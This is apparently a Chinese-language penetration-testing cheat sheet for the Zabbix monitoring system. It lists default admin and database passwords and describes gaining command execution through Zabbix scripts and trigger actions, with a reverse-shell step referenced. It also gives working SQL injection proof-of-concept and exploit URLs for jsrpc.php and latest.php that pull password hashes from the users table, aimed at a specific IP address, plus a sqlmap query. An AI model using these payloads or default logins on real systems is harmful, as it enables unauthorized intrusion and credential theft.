[TOC]
1.Zabbix缺省配置
zabbix缺省账号密码一览:1
2
3
4
5
6admin zabbix #老版本
Admin zabbix #新版本
#zabbix数据库
root zabbix
zabbix zabbix
2.Zabbix命令执行
注意新老版本触发差不多的,此项利用需要登陆后之中在管理菜单栏,然后选择脚本选项卡,添加脚本即可; WeiyiGeek.创建脚本
设置触发动作来执行我们的脚本: WeiyiGeek.触发动作
1 | #触发执行后再tmp可以看见建立的txt文件 |

WeiyiGeek.pythonReverse
注意点:
- 当前zabbix执行的权限问题
- 当前服务器防火墙等等问题(有时监控80端口即可,大部分是放行状态)
3.ZabbixSQL注入
1.jsrpc.php rofileIdx2
存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。1
2
3
4
5
6
7POC:
http://158.199.140.129/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1
关键字:You have an error in your SQL syntax
EXP:
http://158.199.140.129/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1 or (select 1 from (select count(*),concat((select (select concat(passwd)) from zabbix.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or 1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
2.latest.php toggle_ids1
2
3
4http://158.199.140.129/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
SQLMAP:
--dbms=mysql --sql-query "select * from users"